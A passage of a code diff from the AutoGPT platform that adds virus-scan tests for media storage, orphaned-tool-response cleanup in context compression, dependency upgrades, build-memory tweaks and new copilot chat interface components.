+            mock_handler_getter.return_value = mock_handler
+
+            # Mock virus scanner
+            mock_scan.return_value = None
+
+            # Mock file system operations
+            mock_base_path = MagicMock()
+            mock_target_path = MagicMock()
+            mock_resolved_path = MagicMock()
+
+            mock_path_class.return_value = mock_base_path
+            mock_base_path.mkdir = MagicMock()
+            mock_base_path.__truediv__ = MagicMock(return_value=mock_target_path)
+            mock_target_path.resolve.return_value = mock_resolved_path
+            mock_resolved_path.is_relative_to.return_value = True
+            mock_resolved_path.is_file.return_value = True
+            mock_resolved_path.read_bytes.return_value = file_content
+            mock_resolved_path.relative_to.return_value = Path(local_file)
+            mock_resolved_path.name = local_file
+
+            result = await store_media_file(
+                file=MediaFileType(local_file),
+                execution_context=make_test_context(graph_exec_id=graph_exec_id),
+                return_format="for_local_processing",
+            )
+
+            # Verify virus scan was called for local file
+            mock_scan.assert_called_once_with(file_content, filename=local_file)
+
+            # Result should be the relative path
+            assert str(result) == local_file
+
+    @pytest.mark.asyncio
+    async def test_store_media_file_local_path_virus_detected(self):
+        """Test that infected local files raise VirusDetectedError."""
+        from backend.api.features.store.exceptions import VirusDetectedError
+
+        graph_exec_id = "test-exec-123"
+        local_file = "infected.exe"
+        file_content = b"malicious content"
+
+        with patch(
+            "backend.util.file.get_cloud_storage_handler"
+        ) as mock_handler_getter, patch(
+            "backend.util.file.scan_content_safe"
+        ) as mock_scan, patch(
+            "backend.util.file.Path"
+        ) as mock_path_class:
+
+            # Mock cloud storage handler - not a cloud path
+            mock_handler = MagicMock()
+            mock_handler.is_cloud_path.return_value = False
+            mock_handler_getter.return_value = mock_handler
+
+            # Mock virus scanner to detect virus
+            mock_scan.side_effect = VirusDetectedError(
+                "EICAR-Test-File", "File rejected due to virus detection"
+            )
+
+            # Mock file system operations
+            mock_base_path = MagicMock()
+            mock_target_path = MagicMock()
+            mock_resolved_path = MagicMock()
+
+            mock_path_class.return_value = mock_base_path
+            mock_base_path.mkdir = MagicMock()
+            mock_base_path.__truediv__ = MagicMock(return_value=mock_target_path)
+            mock_target_path.resolve.return_value = mock_resolved_path
+            mock_resolved_path.is_relative_to.return_value = True
+            mock_resolved_path.is_file.return_value = True
+            mock_resolved_path.read_bytes.return_value = file_content
+
+            with pytest.raises(VirusDetectedError):
+                await store_media_file(
+                    file=MediaFileType(local_file),
+                    execution_context=make_test_context(graph_exec_id=graph_exec_id),
+                    return_format="for_local_processing",
+                )
--- a/autogpt_platform/backend/backend/util/prompt.py
+++ b/autogpt_platform/backend/backend/util/prompt.py
@@ -364,6 +364,44 @@ def _remove_orphan_tool_responses(
    return result


+def validate_and_remove_orphan_tool_responses(
+    messages: list[dict],
+    log_warning: bool = True,
+) -> list[dict]:
+    """
+    Validate tool_call/tool_response pairs and remove orphaned responses.
+
+    Scans messages in order, tracking all tool_call IDs. Any tool response
+    referencing an ID not seen in that message or an earlier one is considered orphaned
+    and removed. This prevents API errors like Anthropic's "unexpected tool_use_id".
+
+    Args:
+        messages: List of messages to validate (OpenAI or Anthropic format)
+        log_warning: Whether to log a warning when orphans are found
+
+    Returns:
+        The input list itself if there are no orphans, otherwise a filtered list
+    """
+    available_ids: set[str] = set()
+    orphan_ids: set[str] = set()
+
+    for msg in messages:
+        available_ids |= _extract_tool_call_ids_from_message(msg)
+        for resp_id in _extract_tool_response_ids_from_message(msg):
+            if resp_id not in available_ids:
+                orphan_ids.add(resp_id)
+
+    if not orphan_ids:
+        return messages
+
+    if log_warning:
+        logger.warning(
+            f"Removing {len(orphan_ids)} orphan tool response(s): {orphan_ids}"
+        )
+
+    return _remove_orphan_tool_responses(messages, orphan_ids)
+
+
 def _ensure_tool_pairs_intact(
    recent_messages: list[dict],
    all_messages: list[dict],
@@ -723,6 +761,13 @@ async def compress_context(

    # Filter out any None values that may have been introduced
    final_msgs: list[dict] = [m for m in msgs if m is not None]
+
+    # ---- STEP 6: Final tool-pair validation ---------------------------------
+    # After all compression steps, verify that every tool response has a
+    # matching tool_call in a preceding assistant message. Remove orphans
+    # to prevent API errors (e.g., Anthropic's "unexpected tool_use_id").
+    final_msgs = validate_and_remove_orphan_tool_responses(final_msgs)
+
    final_count = sum(_msg_tokens(m, enc) for m in final_msgs)
    error = None
    if final_count + reserve > target_tokens:
--- a/autogpt_platform/backend/poetry.lock
+++ b/autogpt_platform/backend/poetry.lock
--- a/autogpt_platform/backend/pyproject.toml
+++ b/autogpt_platform/backend/pyproject.toml
@@ -12,16 +12,17 @@ python = ">=3.10,<3.14"
 aio-pika = "^9.5.5"
 aiohttp = "^3.10.0"
 aiodns = "^3.5.0"
-anthropic = "^0.59.0"
+anthropic = "^0.79.0"
 apscheduler = "^3.11.1"
 autogpt-libs = { path = "../autogpt_libs", develop = true }
 bleach = { extras = ["css"], version = "^6.2.0" }
+claude-agent-sdk = "^0.1.0"
 click = "^8.2.0"
-cryptography = "^45.0"
+cryptography = "^46.0"
 discord-py = "^2.5.2"
 e2b-code-interpreter = "^1.5.2"
 elevenlabs = "^1.50.0"
-fastapi = "^0.116.1"
+fastapi = "^0.128.6"
 feedparser = "^6.0.11"
 flake8 = "^7.3.0"
 google-api-python-client = "^2.177.0"
@@ -34,11 +35,11 @@ html2text = "^2024.2.26"
 jinja2 = "^3.1.6"
 jsonref = "^1.1.0"
 jsonschema = "^4.25.0"
-langfuse = "^3.11.0"
-launchdarkly-server-sdk = "^9.12.0"
+langfuse = "^3.14.1"
+launchdarkly-server-sdk = "^9.14.1"
 mem0ai = "^0.1.115"
 moviepy = "^2.1.2"
-ollama = "^0.5.1"
+ollama = "^0.6.1"
 openai = "^1.97.1"
 orjson = "^3.10.0"
 pika = "^1.3.2"
@@ -48,16 +49,16 @@ postmarker = "^1.0"
 praw = "~7.8.1"
 prisma = "^0.15.0"
 rank-bm25 = "^0.2.2"
-prometheus-client = "^0.22.1"
+prometheus-client = "^0.24.1"
 prometheus-fastapi-instrumentator = "^7.0.0"
 psutil = "^7.0.0"
 psycopg2-binary = "^2.9.10"
-pydantic = { extras = ["email"], version = "^2.11.7" }
-pydantic-settings = "^2.10.1"
+pydantic = { extras = ["email"], version = "^2.12.5" }
+pydantic-settings = "^2.12.0"
 pytest = "^8.4.1"
 pytest-asyncio = "^1.1.0"
 python-dotenv = "^1.1.1"
-python-multipart = "^0.0.20"
+python-multipart = "^0.0.22"
 redis = "^6.2.0"
 regex = "^2025.9.18"
 replicate = "^1.0.6"
@@ -65,19 +66,19 @@ sentry-sdk = {extras = ["anthropic", "fastapi", "launchdarkly", "openai", "sqlal
 sqlalchemy = "^2.0.40"
 strenum = "^0.4.9"
 stripe = "^11.5.0"
-supabase = "2.17.0"
-tenacity = "^9.1.2"
+supabase = "2.27.3"
+tenacity = "^9.1.4"
 todoist-api-python = "^2.1.7"
 tweepy = "^4.16.0"
-uvicorn = { extras = ["standard"], version = "^0.35.0" }
+uvicorn = { extras = ["standard"], version = "^0.40.0" }
 websockets = "^15.0"
 youtube-transcript-api = "^1.2.1"
 yt-dlp = "2025.12.08"
 zerobouncesdk = "^1.1.2"
 # NOTE: please insert new dependencies in their alphabetical location
 pytest-snapshot = "^0.9.0"
-aiofiles = "^24.1.0"
-tiktoken = "^0.9.0"
+aiofiles = "^25.1.0"
+tiktoken = "^0.12.0"
 aioclamd = "^1.0.0"
 setuptools = "^80.9.0"
 gcloud-aio-storage = "^9.5.0"
@@ -95,13 +96,13 @@ black = "^24.10.0"
 faker = "^38.2.0"
 httpx = "^0.28.1"
 isort = "^5.13.2"
-poethepoet = "^0.37.0"
+poethepoet = "^0.41.0"
 pre-commit = "^4.4.0"
 pyright = "^1.1.407"
 pytest-mock = "^3.15.1"
-pytest-watcher = "^0.4.2"
+pytest-watcher = "^0.6.3"
 requests = "^2.32.5"
-ruff = "^0.14.5"
+ruff = "^0.15.0"
 # NOTE: please insert new dependencies in their alphabetical location

 [build-system]
--- a/autogpt_platform/frontend/Dockerfile
+++ b/autogpt_platform/frontend/Dockerfile
@@ -25,8 +25,12 @@ RUN if [ -f .env.production ]; then \
      cp .env.default .env; \
    fi
 RUN pnpm run generate:api
+# Disable source-map generation in Docker builds to halve webpack memory usage.
+# Source maps are only useful when SENTRY_AUTH_TOKEN is set (Vercel deploys);
+# the Docker image never uploads them, so generating them just wastes RAM.
+ENV NEXT_PUBLIC_SOURCEMAPS="false"
 # In CI, we want NEXT_PUBLIC_PW_TEST=true during build so Next.js inlines it
-RUN if [ "$NEXT_PUBLIC_PW_TEST" = "true" ]; then NEXT_PUBLIC_PW_TEST=true NODE_OPTIONS="--max-old-space-size=4096" pnpm build; else NODE_OPTIONS="--max-old-space-size=4096" pnpm build; fi
+RUN if [ "$NEXT_PUBLIC_PW_TEST" = "true" ]; then NEXT_PUBLIC_PW_TEST=true NODE_OPTIONS="--max-old-space-size=8192" pnpm build; else NODE_OPTIONS="--max-old-space-size=8192" pnpm build; fi

 # Prod stage - based on NextJS reference Dockerfile https://github.com/vercel/next.js/blob/64271354533ed16da51be5dce85f0dbd15f17517/examples/with-docker/Dockerfile
 FROM node:21-alpine AS prod
--- a/autogpt_platform/frontend/next.config.mjs
+++ b/autogpt_platform/frontend/next.config.mjs
@@ -1,8 +1,12 @@
 import { withSentryConfig } from "@sentry/nextjs";

+// Allow Docker builds to skip source-map generation (halves memory usage).
+// Defaults to true so Vercel/local builds are unaffected.
+const enableSourceMaps = process.env.NEXT_PUBLIC_SOURCEMAPS !== "false";
+
 /** @type {import('next').NextConfig} */
 const nextConfig = {
-  productionBrowserSourceMaps: true,
+  productionBrowserSourceMaps: enableSourceMaps,
  // Externalize OpenTelemetry packages to fix Turbopack HMR issues
  serverExternalPackages: [
    "@opentelemetry/instrumentation",
@@ -14,9 +18,37 @@ const nextConfig = {
    serverActions: {
      bodySizeLimit: "256mb",
    },
-    // Increase body size limit for API routes (file uploads) - 256MB to match backend limit
-    proxyClientMaxBodySize: "256mb",
    middlewareClientMaxBodySize: "256mb",
+    // Limit parallel webpack workers to reduce peak memory during builds.
+    cpus: 2,
+  },
+  // Work around cssnano "Invalid array length" bug in Next.js's bundled
+  // cssnano-simple comment parser when processing very large CSS chunks.
+  // CSS is still bundled correctly, just not minified; gzip recovers most of the size.
+  webpack: (config, { dev }) => {
+    if (!dev) {
+      // Next.js adds CssMinimizerPlugin internally (after user config), so we
+      // can't filter it from config.plugins. Instead, intercept the webpack
+      // compilation hooks and replace the buggy plugin's tap with a no-op.
+      config.plugins.push({
+        apply(compiler) {
+          compiler.hooks.compilation.tap(
+            "DisableCssMinimizer",
+            (compilation) => {
+              compilation.hooks.processAssets.intercept({
+                register: (tap) => {
+                  if (tap.name === "CssMinimizerPlugin") {
+                    return { ...tap, fn: async () => {} };
+                  }
+                  return tap;
+                },
+              });
+            },
+          );
+        },
+      });
+    }
+    return config;
  },
  images: {
    domains: [
@@ -54,9 +86,16 @@ const nextConfig = {
  transpilePackages: ["geist"],
 };

-const isDevelopmentBuild = process.env.NODE_ENV !== "production";
+// Only run the Sentry webpack plugin when we can actually upload source maps
+// (i.e. on Vercel with SENTRY_AUTH_TOKEN set). The Sentry *runtime* SDK
+// (imported in app code) still captures errors without the plugin.
+// Skipping the plugin saves ~1 GB of peak memory during `next build`.
+const skipSentryPlugin =
+  process.env.NODE_ENV !== "production" ||
+  !enableSourceMaps ||
+  !process.env.SENTRY_AUTH_TOKEN;

-export default isDevelopmentBuild
+export default skipSentryPlugin
  ? nextConfig
  : withSentryConfig(nextConfig, {
      // For all available options, see:
@@ -96,7 +135,7 @@ export default isDevelopmentBuild

      // This helps Sentry with sourcemaps... https://docs.sentry.io/platforms/javascript/guides/nextjs/sourcemaps/
      sourcemaps: {
-        disable: false,
+        disable: !enableSourceMaps,
        assets: [".next/**/*.js", ".next/**/*.js.map"],
        ignore: ["**/node_modules/**"],
        deleteSourcemapsAfterUpload: false, // Source is public anyway :)
--- a/autogpt_platform/frontend/package.json
+++ b/autogpt_platform/frontend/package.json
@@ -7,7 +7,7 @@
  },
  "scripts": {
    "dev": "pnpm run generate:api:force && next dev --turbo",
-    "build": "next build",
+    "build": "cross-env NODE_OPTIONS=--max-old-space-size=16384 next build",
    "start": "next start",
    "start:standalone": "cd .next/standalone && node server.js",
    "lint": "next lint && prettier --check .",
@@ -30,6 +30,7 @@
    "defaults"
  ],
  "dependencies": {
+    "@ai-sdk/react": "3.0.61",
    "@faker-js/faker": "10.0.0",
    "@hookform/resolvers": "5.2.2",
    "@next/third-parties": "15.4.6",
@@ -60,6 +61,10 @@
    "@rjsf/utils": "6.1.2",
    "@rjsf/validator-ajv8": "6.1.2",
    "@sentry/nextjs": "10.27.0",
+    "@streamdown/cjk": "1.0.1",
+    "@streamdown/code": "1.0.1",
+    "@streamdown/math": "1.0.1",
+    "@streamdown/mermaid": "1.0.1",
    "@supabase/ssr": "0.7.0",
    "@supabase/supabase-js": "2.78.0",
    "@tanstack/react-query": "5.90.6",
@@ -68,6 +73,7 @@
    "@vercel/analytics": "1.5.0",
    "@vercel/speed-insights": "1.2.0",
    "@xyflow/react": "12.9.2",
+    "ai": "6.0.59",
    "boring-avatars": "1.11.2",
    "class-variance-authority": "0.7.1",
    "clsx": "2.1.1",
@@ -87,7 +93,6 @@
    "launchdarkly-react-client-sdk": "3.9.0",
    "lodash": "4.17.21",
    "lucide-react": "0.552.0",
-    "moment": "2.30.1",
    "next": "15.4.10",
    "next-themes": "0.4.6",
    "nuqs": "2.7.2",
@@ -102,7 +107,7 @@
    "react-markdown": "9.0.3",
    "react-modal": "3.16.3",
    "react-shepherd": "6.1.9",
-    "react-window": "1.8.11",
+    "react-window": "2.2.0",
    "recharts": "3.3.0",
    "rehype-autolink-headings": "7.1.0",
    "rehype-highlight": "7.0.2",
@@ -112,9 +117,11 @@
    "remark-math": "6.0.0",
    "shepherd.js": "14.5.1",
    "sonner": "2.0.7",
+    "streamdown": "2.1.0",
    "tailwind-merge": "2.6.0",
    "tailwind-scrollbar": "3.1.0",
    "tailwindcss-animate": "1.0.7",
+    "use-stick-to-bottom": "1.1.2",
    "uuid": "11.1.0",
    "vaul": "1.1.2",
    "zod": "3.25.76",
@@ -140,7 +147,7 @@
    "@types/react": "18.3.17",
    "@types/react-dom": "18.3.5",
    "@types/react-modal": "3.16.3",
-    "@types/react-window": "1.8.8",
+    "@types/react-window": "2.0.0",
    "@vitejs/plugin-react": "5.1.2",
    "axe-playwright": "2.2.2",
    "chromatic": "13.3.3",
@@ -172,7 +179,8 @@
  },
  "pnpm": {
    "overrides": {
-      "@opentelemetry/instrumentation": "0.209.0"
+      "@opentelemetry/instrumentation": "0.209.0",
+      "lodash-es": "4.17.23"
    }
  },
  "packageManager": "pnpm@10.20.0+sha512.cf9998222162dd85864d0a8102e7892e7ba4ceadebbf5a31f9c2fce48dfce317a9c53b9f6464d1ef9042cba2e02ae02a9f7c143a2b438cd93c91840f0192b9dd"
--- a/autogpt_platform/frontend/pnpm-lock.yaml
+++ b/autogpt_platform/frontend/pnpm-lock.yaml
--- a/autogpt_platform/frontend/src/app/(platform)/build/components/NewControlPanel/NewBlockMenu/BlockMenuSearchBar/useBlockMenuSearchBar.ts
+++ b/autogpt_platform/frontend/src/app/(platform)/build/components/NewControlPanel/NewBlockMenu/BlockMenuSearchBar/useBlockMenuSearchBar.ts
@@ -1,4 +1,4 @@
-import { debounce } from "lodash";
+import debounce from "lodash/debounce";
 import { useCallback, useEffect, useRef, useState } from "react";
 import { useBlockMenuStore } from "../../../../stores/blockMenuStore";
 import { getQueryClient } from "@/lib/react-query/queryClient";
--- a/autogpt_platform/frontend/src/app/(platform)/build/components/NewControlPanel/NewBlockMenu/HorizontalScroll.tsx
+++ b/autogpt_platform/frontend/src/app/(platform)/build/components/NewControlPanel/NewBlockMenu/HorizontalScroll.tsx
@@ -70,10 +70,10 @@ export const HorizontalScroll: React.FC<HorizontalScrollAreaProps> = ({
          {children}
        </div>
        {canScrollLeft && (
-          <div className="pointer-events-none absolute inset-y-0 left-0 w-8 bg-gradient-to-r from-white via-white/80 to-white/0" />
+          <div className="pointer-events-none absolute inset-y-0 left-0 w-8 bg-gradient-to-r from-background via-background/80 to-background/0" />
        )}
        {canScrollRight && (
-          <div className="pointer-events-none absolute inset-y-0 right-0 w-8 bg-gradient-to-l from-white via-white/80 to-white/0" />
+          <div className="pointer-events-none absolute inset-y-0 right-0 w-8 bg-gradient-to-l from-background via-background/80 to-background/0" />
        )}
        {canScrollLeft && (
          <button
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/CopilotPage.tsx
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/CopilotPage.tsx
@@ -0,0 +1,80 @@
+"use client";
+
+import { SidebarProvider } from "@/components/ui/sidebar";
+import { ChatContainer } from "./components/ChatContainer/ChatContainer";
+import { ChatSidebar } from "./components/ChatSidebar/ChatSidebar";
+import { MobileDrawer } from "./components/MobileDrawer/MobileDrawer";
+import { MobileHeader } from "./components/MobileHeader/MobileHeader";
+import { ScaleLoader } from "./components/ScaleLoader/ScaleLoader";
+import { useCopilotPage } from "./useCopilotPage";
+
+export function CopilotPage() {
+  const {
+    sessionId,
+    messages,
+    status,
+    error,
+    stop,
+    createSession,
+    onSend,
+    isLoadingSession,
+    isCreatingSession,
+    isUserLoading,
+    isLoggedIn,
+    // Mobile drawer
+    isMobile,
+    isDrawerOpen,
+    sessions,
+    isLoadingSessions,
+    handleOpenDrawer,
+    handleCloseDrawer,
+    handleDrawerOpenChange,
+    handleSelectSession,
+    handleNewChat,
+  } = useCopilotPage();
+
+  if (isUserLoading || !isLoggedIn) {
+    return (
+      <div className="fixed inset-0 z-50 flex items-center justify-center bg-[#f8f8f9]">
+        <ScaleLoader className="text-neutral-400" />
+      </div>
+    );
+  }
+
+  return (
+    <SidebarProvider
+      defaultOpen={true}
+      className="h-[calc(100vh-72px)] min-h-0"
+    >
+      {!isMobile && <ChatSidebar />}
+      <div className="relative flex h-full w-full flex-col overflow-hidden bg-[#f8f8f9] px-0">
+        {isMobile && <MobileHeader onOpenDrawer={handleOpenDrawer} />}
+        <div className="flex-1 overflow-hidden">
+          <ChatContainer
+            messages={messages}
+            status={status}
+            error={error}
+            sessionId={sessionId}
+            isLoadingSession={isLoadingSession}
+            isCreatingSession={isCreatingSession}
+            onCreateSession={createSession}
+            onSend={onSend}
+            onStop={stop}
+          />
+        </div>
+      </div>
+      {isMobile && (
+        <MobileDrawer
+          isOpen={isDrawerOpen}
+          sessions={sessions}
+          currentSessionId={sessionId}
+          isLoading={isLoadingSessions}
+          onSelectSession={handleSelectSession}
+          onNewChat={handleNewChat}
+          onClose={handleCloseDrawer}
+          onOpenChange={handleDrawerOpenChange}
+        />
+      )}
+    </SidebarProvider>
+  );
+}
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/ChatContainer/ChatContainer.tsx
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/ChatContainer/ChatContainer.tsx
@@ -0,0 +1,74 @@
+"use client";
+import { ChatInput } from "@/app/(platform)/copilot/components/ChatInput/ChatInput";
+import { UIDataTypes, UIMessage, UITools } from "ai";
+import { LayoutGroup, motion } from "framer-motion";
+import { ChatMessagesContainer } from "../ChatMessagesContainer/ChatMessagesContainer";
+import { CopilotChatActionsProvider } from "../CopilotChatActionsProvider/CopilotChatActionsProvider";
+import { EmptySession } from "../EmptySession/EmptySession";
+
+export interface ChatContainerProps {
+  messages: UIMessage<unknown, UIDataTypes, UITools>[];
+  status: string;
+  error: Error | undefined;
+  sessionId: string | null;
+  isLoadingSession: boolean;
+  isCreatingSession: boolean;
+  onCreateSession: () => void | Promise<string>;
+  onSend: (message: string) => void | Promise<void>;
+  onStop: () => void;
+}
+export const ChatContainer = ({
+  messages,
+  status,
+  error,
+  sessionId,
+  isLoadingSession,
+  isCreatingSession,
+  onCreateSession,
+  onSend,
+  onStop,
+}: ChatContainerProps) => {
+  const inputLayoutId = "copilot-2-chat-input";
+
+  return (
+    <CopilotChatActionsProvider onSend={onSend}>
+      <LayoutGroup id="copilot-2-chat-layout">
+        <div className="flex h-full min-h-0 w-full flex-col bg-[#f8f8f9] px-2 lg:px-0">
+          {sessionId ? (
+            <div className="mx-auto flex h-full min-h-0 w-full max-w-3xl flex-col">
+              <ChatMessagesContainer
+                messages={messages}
+                status={status}
+                error={error}
+                isLoading={isLoadingSession}
+              />
+              <motion.div
+                initial={{ opacity: 0 }}
+                animate={{ opacity: 1 }}
+                transition={{ duration: 0.3 }}
+                className="relative px-3 pb-2 pt-2"
+              >
+                <div className="pointer-events-none absolute left-0 right-0 top-[-18px] z-10 h-6 bg-gradient-to-b from-transparent to-[#f8f8f9]" />
+                <ChatInput
+                  inputId="chat-input-session"
+                  onSend={onSend}
+                  disabled={status === "streaming"}
+                  isStreaming={status === "streaming"}
+                  onStop={onStop}
+                  placeholder="What else can I help with?"
+                />
+              </motion.div>
+            </div>
+          ) : (
+            <EmptySession
+              inputLayoutId={inputLayoutId}
+              isCreatingSession={isCreatingSession}
+              onCreateSession={onCreateSession}
+              onSend={onSend}
+            />
+          )}
+        </div>
+      </LayoutGroup>
+    </CopilotChatActionsProvider>
+  );
+};
--- a/autogpt_platform/frontend/src/components/contextual/Chat/components/ChatInput/ChatInput.tsx
+++ b/autogpt_platform/frontend/src/components/contextual/Chat/components/ChatInput/ChatInput.tsx
@@ -6,17 +6,19 @@ import {
  MicrophoneIcon,
  StopIcon,
 } from "@phosphor-icons/react";
+import { ChangeEvent, useCallback } from "react";
 import { RecordingIndicator } from "./components/RecordingIndicator";
 import { useChatInput } from "./useChatInput";
 import { useVoiceRecording } from "./useVoiceRecording";

 export interface Props {
-  onSend: (message: string) => void;
+  onSend: (message: string) => void | Promise<void>;
  disabled?: boolean;
  isStreaming?: boolean;
  onStop?: () => void;
  placeholder?: string;
  className?: string;
+  inputId?: string;
 }

 export function ChatInput({
@@ -26,14 +28,14 @@ export function ChatInput({
  onStop,
  placeholder = "Type your message...",
  className,
+  inputId = "chat-input",
 }: Props) {
-  const inputId = "chat-input";
  const {
    value,
    setValue,
    handleKeyDown: baseHandleKeyDown,
    handleSubmit,
-    handleChange,
+    handleChange: baseHandleChange,
    hasMultipleLines,
  } = useChatInput({
    onSend,
@@ -60,6 +62,15 @@ export function ChatInput({
    inputId,
  });

+  // Block text changes when recording
+  const handleChange = useCallback(
+    (e: ChangeEvent<HTMLTextAreaElement>) => {
+      if (isRecording) return;
+      baseHandleChange(e);
+    },
+    [isRecording, baseHandleChange],
+  );
+
  return (
    <form onSubmit={handleSubmit} className={cn("relative flex-1", className)}>
      <div className="relative">
--- a/autogpt_platform/frontend/src/components/contextual/Chat/components/ChatInput/components/AudioWaveform.tsx
+++ b/autogpt_platform/frontend/src/components/contextual/Chat/components/ChatInput/components/AudioWaveform.tsx
--- a/autogpt_platform/frontend/src/components/contextual/Chat/components/ChatInput/components/RecordingIndicator.tsx
+++ b/autogpt_platform/frontend/src/components/contextual/Chat/components/ChatInput/components/RecordingIndicator.tsx
--- a/autogpt_platform/frontend/src/components/contextual/Chat/components/ChatInput/helpers.ts
+++ b/autogpt_platform/frontend/src/components/contextual/Chat/components/ChatInput/helpers.ts
--- a/autogpt_platform/frontend/src/components/contextual/Chat/components/ChatInput/useChatInput.ts
+++ b/autogpt_platform/frontend/src/components/contextual/Chat/components/ChatInput/useChatInput.ts
@@ -21,6 +21,7 @@ export function useChatInput({
 }: Args) {
  const [value, setValue] = useState("");
  const [hasMultipleLines, setHasMultipleLines] = useState(false);
+  const [isSending, setIsSending] = useState(false);

  useEffect(
    function focusOnMount() {
@@ -100,34 +101,40 @@ export function useChatInput({
    }
  }, [value, maxRows, inputId]);

-  const handleSend = () => {
-    if (disabled || !value.trim()) return;
-    onSend(value.trim());
-    setValue("");
-    setHasMultipleLines(false);
-    const textarea = document.getElementById(inputId) as HTMLTextAreaElement;
-    const wrapper = document.getElementById(
-      `${inputId}-wrapper`,
-    ) as HTMLDivElement;
-    if (textarea) {
-      textarea.style.height = "auto";
+  async function handleSend() {
+    if (disabled || isSending || !value.trim()) return;
+
+    setIsSending(true);
+    try {
+      await onSend(value.trim());
+      setValue("");
+      setHasMultipleLines(false);
+      const textarea = document.getElementById(inputId) as HTMLTextAreaElement;
+      const wrapper = document.getElementById(
+        `${inputId}-wrapper`,
+      ) as HTMLDivElement;
+      if (textarea) {
+        textarea.style.height = "auto";
+      }
+      if (wrapper) {
+        wrapper.style.height = "";
+        wrapper.style.maxHeight = "";
+      }
+    } finally {
+      setIsSending(false);
    }
-    if (wrapper) {
-      wrapper.style.height = "";
-      wrapper.style.maxHeight = "";
-    }
-  };
+  }

  function handleKeyDown(event: KeyboardEvent<HTMLTextAreaElement>) {
    if (event.key === "Enter" && !event.shiftKey) {
      event.preventDefault();
-      handleSend();
+      void handleSend();
    }
  }

  function handleSubmit(e: FormEvent<HTMLFormElement>) {
    e.preventDefault();
-    handleSend();
+    void handleSend();
  }

  function handleChange(e: ChangeEvent<HTMLTextAreaElement>) {
@@ -142,5 +149,6 @@ export function useChatInput({
    handleSubmit,
    handleChange,
    hasMultipleLines,
+    isSending,
  };
 }
--- a/autogpt_platform/frontend/src/components/contextual/Chat/components/ChatInput/useVoiceRecording.ts
+++ b/autogpt_platform/frontend/src/components/contextual/Chat/components/ChatInput/useVoiceRecording.ts
@@ -38,9 +38,13 @@ export function useVoiceRecording({
  const streamRef = useRef<MediaStream | null>(null);
  const isRecordingRef = useRef(false);

-  const isSupported =
-    typeof window !== "undefined" &&
-    !!(navigator.mediaDevices && navigator.mediaDevices.getUserMedia);
+  const [isSupported, setIsSupported] = useState(false);
+
+  useEffect(() => {
+    setIsSupported(
+      !!(navigator.mediaDevices && navigator.mediaDevices.getUserMedia),
+    );
+  }, []);

  const clearTimer = useCallback(() => {
    if (timerRef.current) {
@@ -214,17 +218,33 @@ export function useVoiceRecording({

  const handleKeyDown = useCallback(
    (event: KeyboardEvent<HTMLTextAreaElement>) => {
-      if (event.key === " " && !value.trim() && !isTranscribing) {
+      // Allow space to toggle recording (start when empty, stop when recording)
+      if (event.key === " " && !isTranscribing) {
+        if (isRecordingRef.current) {
+          // Stop recording on space
+          event.preventDefault();
+          stopRecording();
+          return;
+        } else if (!value.trim()) {
+          // Start recording on space when input is empty
+          event.preventDefault();
+          void startRecording();
+          return;
+        }
+      }
+      // Block all key events when recording (except space handled above)
+      if (isRecordingRef.current) {
        event.preventDefault();
-        toggleRecording();
        return;
      }
      baseHandleKeyDown(event);
    },
-    [value, isTranscribing, toggleRecording, baseHandleKeyDown],
+    [value, isTranscribing, stopRecording, startRecording, baseHandleKeyDown],
  );

  const showMicButton = isSupported;
+  // Don't include isRecording in disabled state - we need key events to work
+  // Text input is blocked via handleKeyDown (and ChatInput's handleChange) instead
  const isInputDisabled = disabled || isStreaming || isTranscribing;

  // Cleanup on unmount
--- a/autogpt_platform/frontend/src/app/(platform)/copilot/components/ChatMessagesContainer/ChatMessagesContainer.tsx
+++ b/autogpt_platform/frontend/src/app/(platform)/copilot/components/ChatMessagesContainer/ChatMessagesContainer.tsx
@@ -0,0 +1,305 @@
+import { getGetWorkspaceDownloadFileByIdUrl } from "@/app/api/__generated__/endpoints/workspace/workspace";
+import {
+  Conversation,
+  ConversationContent,
+  ConversationScrollButton,
+} from "@/components/ai-elements/conversation";
+import {
+  Message,
+  MessageContent,
+  MessageResponse,
+} from "@/components/ai-elements/message";
+import { LoadingSpinner } from "@/components/atoms/LoadingSpinner/LoadingSpinner";
+import { toast } from "@/components/molecules/Toast/use-toast";
+import { ToolUIPart, UIDataTypes, UIMessage, UITools } from "ai";
+import { useEffect, useRef, useState } from "react";
+import { CreateAgentTool } from "../../tools/CreateAgent/CreateAgent";
+import { EditAgentTool } from "../../tools/EditAgent/EditAgent";
+import { FindAgentsTool } from "../../tools/FindAgents/FindAgents";
+import { FindBlocksTool } from "../../tools/FindBlocks/FindBlocks";
+import { RunAgentTool } from "../../tools/RunAgent/RunAgent";
+import { RunBlockTool } from "../../tools/RunBlock/RunBlock";
+import { SearchDocsTool } from "../../tools/SearchDocs/SearchDocs";
+import { GenericTool } from "../../tools/GenericTool/GenericTool";
+import { ViewAgentOutputTool } from "../../tools/ViewAgentOutput/ViewAgentOutput";
+
+// ---------------------------------------------------------------------------
+// Workspace media support
+// ---------------------------------------------------------------------------
+
+/**
+ * Rewrites markdown images that point at `workspace://<fileId>` so they load
+ * through the `/api/proxy` download route. An optional `#<mime>` fragment is
+ * treated as a MIME hint: for `video/*` the alt text gains a "video:" prefix,
+ * which the custom img component uses to render a <video> element instead.
+ */
+function resolveWorkspaceUrls(text: string): string {
+  const workspaceImage =
+    /!\[([^\]]*)\]\(workspace:\/\/([^)#\s]+)(?:#([^)\s]*))?\)/g;
+  return text.replace(
+    workspaceImage,
+    (_match, alt: string, fileId: string, mimeHint?: string) => {
+      const isVideo = mimeHint?.startsWith("video/") ?? false;
+      const label = isVideo ? `video:${alt || "Video"}` : alt || "Image";
+      const url = `/api/proxy${getGetWorkspaceDownloadFileByIdUrl(fileId)}`;
+      return `![${label}](${url})`;
+    },
+  );
+}
+
+/**
+ * `img` override for Streamdown with workspace-media awareness. Alt text that
+ * begins with "video:" is rendered as a <video> player, and so is a workspace
+ * file whose <img> failed to load. Every other image stays a plain <img>.
+ */
+function WorkspaceMediaImage(props: React.JSX.IntrinsicElements["img"]) {
+  const { src, alt, ...rest } = props;
+  // State is declared ahead of the early return so hooks run on every render.
+  const [imgFailed, setImgFailed] = useState(false);
+
+  if (!src) return null;
+
+  const isWorkspace = src.includes("/workspace/files/");
+  const mediaClass = "h-auto max-w-full rounded-md border border-zinc-200";
+  const showVideo = alt?.startsWith("video:") || (imgFailed && isWorkspace);
+
+  if (!showVideo) {
